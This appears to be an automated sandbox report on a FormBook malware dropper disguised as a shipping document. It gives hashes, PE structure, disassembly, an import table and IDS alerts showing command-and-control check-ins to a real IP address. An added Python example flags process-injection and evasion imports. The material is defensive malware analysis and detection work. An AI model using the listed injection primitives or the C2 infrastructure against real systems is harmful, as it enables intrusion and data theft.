                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):289280
                                                              Entropy (8bit):7.990767596855463
                                                              Encrypted:true
                                                              SSDEEP:6144:JonMG50dlwYIXpBu8/x9FboCD2x4LFwqlZuXZp:JIhqvQxxHECG4ZlQX3
                                                              MD5:3A0452B9679C111D44CBC7503531DF2B
                                                              SHA1:5D6FA2BA57215604ABA1CE4263E9480FE378F7B9
                                                              SHA-256:304D1BCA3BA849391726F80F2628EB5F98CD81377D389BB2AD70734938745C52
                                                              SHA-512:4197CD566D72695EC954286678388A95C83A9AED9C3215C05D0F5FA9F571ACD30284E399D2F6CCD17E11D1A402F31BEF9079E71010297D8199C2E03BDCF14427
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:u..JIA3K21T8..JJ.3K61T8J.JJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJ.3K6?K.DX.C...7}...0#9aC9YV&Y'x)+/]$B.6]j*?$aZ%.u.kj5%.$.F;;p8JXJJA3278..*?.w!T..Q3.P..{S,.+.d*-.)..hX-..#"[vVV.8JXJJA3KftT8.YKJ."h1T8JXJJA.K40_9AXJ.E3K61T8JXJ.R3K6!T8J(NJA3.61D8JXHJA5K61T8JXLJA3K61T8:\JJC3K61T8HX..A3[61D8JXJZA3[61T8JXZJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXd>$K?61T..\JJQ3K6iP8JHJJA3K61T8JXJJA.K6QT8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61
                                                              Process:C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):289280
                                                              Entropy (8bit):7.990767596855463
                                                              Encrypted:true
                                                              SSDEEP:6144:JonMG50dlwYIXpBu8/x9FboCD2x4LFwqlZuXZp:JIhqvQxxHECG4ZlQX3
                                                              MD5:3A0452B9679C111D44CBC7503531DF2B
                                                              SHA1:5D6FA2BA57215604ABA1CE4263E9480FE378F7B9
                                                              SHA-256:304D1BCA3BA849391726F80F2628EB5F98CD81377D389BB2AD70734938745C52
                                                              SHA-512:4197CD566D72695EC954286678388A95C83A9AED9C3215C05D0F5FA9F571ACD30284E399D2F6CCD17E11D1A402F31BEF9079E71010297D8199C2E03BDCF14427
                                                              Malicious:false
                                                              Preview:u..JIA3K21T8..JJ.3K61T8J.JJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJ.3K6?K.DX.C...7}...0#9aC9YV&Y'x)+/]$B.6]j*?$aZ%.u.kj5%.$.F;;p8JXJJA3278..*?.w!T..Q3.P..{S,.+.d*-.)..hX-..#"[vVV.8JXJJA3KftT8.YKJ."h1T8JXJJA.K40_9AXJ.E3K61T8JXJ.R3K6!T8J(NJA3.61D8JXHJA5K61T8JXLJA3K61T8:\JJC3K61T8HX..A3[61D8JXJZA3[61T8JXZJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXd>$K?61T..\JJQ3K6iP8JHJJA3K61T8JXJJA.K6QT8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61T8JXJJA3K61
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.196280787959174
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:DRAFT COPY BL, CI & PL.exe
                                                              File size:1'213'952 bytes
                                                              MD5:0fac19920fd79caf5abd90da55b6a5e9
                                                              SHA1:804e3083eedc496d77ce7a5537fe9aa36ee68bd1
                                                              SHA256:da172efecaad48e51e4fa1907014ed7f7b871bd701d9690c4a5a1f0530e34397
                                                              SHA512:07d91ea27594f080cf04e28f754b6c4f52f2f2bfb105b0bd7c07517cffff32a73da40ea871f08910319394d0e04c6ed0002d533f35a5a610e3f7f82f0eea2df8
                                                              SSDEEP:24576:Yu6J33O0c+JY5UZ+XC0kGso6FapKfQCdhoABOUhGYHoJWY:Su0c++OCvkGs9FapJCdhvphGMY
                                                              TLSH:8645CF22B3DDC360CB669173BF6977016EBF78610630B85B2F980D7DA960172162D7A3
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                              Icon Hash:aaf3e3e3938382a0
                                                              Entrypoint:0x427dcd
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x6756479F [Mon Dec 9 01:27:59 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:5
                                                              OS Version Minor:1
                                                              File Version Major:5
                                                              File Version Minor:1
                                                              Subsystem Version Major:5
                                                              Subsystem Version Minor:1
                                                              Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                              Instruction
                                                              call 00007F91C90885BAh
                                                              jmp 00007F91C907B384h
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              int3
                                                              push edi
                                                              push esi
                                                              mov esi, dword ptr [esp+10h]
                                                              mov ecx, dword ptr [esp+14h]
                                                              mov edi, dword ptr [esp+0Ch]
                                                              mov eax, ecx
                                                              mov edx, ecx
                                                              add eax, esi
                                                              cmp edi, esi
                                                              jbe 00007F91C907B50Ah
                                                              cmp edi, eax
                                                              jc 00007F91C907B86Eh
                                                              bt dword ptr [004C31FCh], 01h
                                                              jnc 00007F91C907B509h
                                                              rep movsb
                                                              jmp 00007F91C907B81Ch
                                                              cmp ecx, 00000080h
                                                              jc 00007F91C907B6D4h
                                                              mov eax, edi
                                                              xor eax, esi
                                                              test eax, 0000000Fh
                                                              jne 00007F91C907B510h
                                                              bt dword ptr [004BE324h], 01h
                                                              jc 00007F91C907B9E0h
                                                              bt dword ptr [004C31FCh], 00000000h
                                                              jnc 00007F91C907B6ADh
                                                              test edi, 00000003h
                                                              jne 00007F91C907B6BEh
                                                              test esi, 00000003h
                                                              jne 00007F91C907B69Dh
                                                              bt edi, 02h
                                                              jnc 00007F91C907B50Fh
                                                              mov eax, dword ptr [esi]
                                                              sub ecx, 04h
                                                              lea esi, dword ptr [esi+04h]
                                                              mov dword ptr [edi], eax
                                                              lea edi, dword ptr [edi+04h]
                                                              bt edi, 03h
                                                              jnc 00007F91C907B513h
                                                              movq xmm1, qword ptr [esi]
                                                              sub ecx, 08h
                                                              lea esi, dword ptr [esi+08h]
                                                              movq qword ptr [edi], xmm1
                                                              lea edi, dword ptr [edi+08h]
                                                              test esi, 00000007h
                                                              je 00007F91C907B565h
                                                              bt esi, 03h
                                                              jnc 00007F91C907B5B8h
                                                              Programming Language:
                                                              • [ASM] VS2013 build 21005
                                                              • [ C ] VS2013 build 21005
                                                              • [C++] VS2013 build 21005
                                                              • [ C ] VS2008 SP1 build 30729
                                                              • [IMP] VS2008 SP1 build 30729
                                                              • [ASM] VS2013 UPD4 build 31101
                                                              • [RES] VS2013 build 21005
                                                              • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5fda0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x127000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5fda0 | 0x5fe00 | 8d3031408a9e39d00d7906e2034716c2 | False | 0.9317068326271186 | data | 7.902296630790876 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x127000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x57067 | data | | | 1.0003254267719628
RT_GROUP_ICON | 0x126820 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x126898 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1268ac | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1268c0 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1268d4 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1269b0 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
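The import table above is the static one of the executable, which the report classifies as a compiled AutoIt script; the names in it (Beep, SetVolumeLabelW, SHEmptyRecycleBinW, BlockInput, InitiateSystemShutdownExW and the rest) are what the AutoIt3 interpreter links against, so they describe what the interpreter can do, not what the embedded script or the injected FormBook payload does. Rule-based triage over the table still surfaces the point worth noticing: the remote-write primitives (OpenProcess, VirtualAllocEx, WriteProcessMemory) are imported, no remote-execution primitive (CreateRemoteThread, SetThreadContext, QueueUserAPC) is, and GetProcAddress with LoadLibrary* is, so everything the behavioural signatures attribute to this sample beyond memory writes is resolved at run time and is invisible here. The Python below is an added example, not Joe Sandbox code: the rule names and thresholds are my own, and IMPORTS is a constructed subset of the table above, trimmed to the names the rules consult (every name in it does appear in the table).

```python
# Constructed sample: a subset of the report's import table, trimmed to the
# names the rules below consult.  Every name here appears in the table above.
IMPORTS = {
    "KERNEL32.dll": "OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, "
                    "CreateThread, ResumeThread, CreateToolhelp32Snapshot, Process32FirstW, "
                    "Process32NextW, LoadLibraryA, LoadLibraryW, LoadLibraryExW, GetProcAddress, "
                    "IsDebuggerPresent, OutputDebugStringW, QueryPerformanceCounter, VirtualAlloc",
    "USER32.dll": "BlockInput, AttachThreadInput, GetAsyncKeyState, GetKeyboardState, "
                  "SendInput, keybd_event, mouse_event, GetClipboardData, SetClipboardData",
    "ADVAPI32.dll": "AdjustTokenPrivileges, OpenProcessToken, LookupPrivilegeValueW, "
                    "DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, LogonUserW",
}

# Rule -> (all-of set, any-of set).  A rule fires only when every "all-of" name is
# imported and, when "any-of" is non-empty, at least one of those is imported too.
# The groupings are this example's assumptions, not a published capability model.
RULES = {
    "remote memory write": ({"OpenProcess", "VirtualAllocEx", "WriteProcessMemory"}, set()),
    "remote code execution primitive": (set(), {"CreateRemoteThread", "SetThreadContext",
                                                "QueueUserAPC", "NtCreateThreadEx",
                                                "RtlCreateUserThread"}),
    "process enumeration": ({"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
                            set()),
    "dynamic API resolution": ({"GetProcAddress"},
                               {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExW"}),
    "debugger checks": (set(), {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
                                "OutputDebugStringW"}),
    "input blocking / key state": (set(), {"BlockInput", "GetAsyncKeyState", "SetWindowsHookExW"}),
    "token manipulation / run-as": ({"AdjustTokenPrivileges"},
                                    {"CreateProcessAsUserW", "CreateProcessWithLogonW",
                                     "LogonUserW"}),
}


def parse_imports(table):
    """Map every imported API name to the DLL that exports it."""
    origin = {}
    for dll, names in table.items():
        for name in names.split(","):
            name = name.strip()
            if name:
                origin[name] = dll
    return origin


def evaluate(origin, rules=RULES):
    """Return ({rule: sorted matched names} for rules that fire,
    [rules that did not fire]) in RULES order."""
    present = set(origin)
    fired, missing = {}, []
    for rule, (all_of, any_of) in rules.items():
        if all_of <= present and (not any_of or any_of & present):
            fired[rule] = sorted((all_of | any_of) & present)
        else:
            missing.append(rule)
    return fired, missing


if __name__ == "__main__":
    fired, missing = evaluate(parse_imports(IMPORTS))
    for rule, names in fired.items():
        print(f"[+] {rule}: {', '.join(names)}")
    for rule in missing:
        print(f"[-] {rule}: not in static imports (resolved at run time, if at all)")
```

The useful output is the `[-]` line: a static table that can write into another process but cannot start code there is the shape you expect from a loader that resolves the rest through GetProcAddress, which is why the report's injection and thread-context findings come from behavioural signatures rather than from this table.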
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-09T09:11:03.518511+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49797 | 217.160.0.113 | 80 | TCP
2024-12-09T09:11:06.236207+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49804 | 217.160.0.113 | 80 | TCP
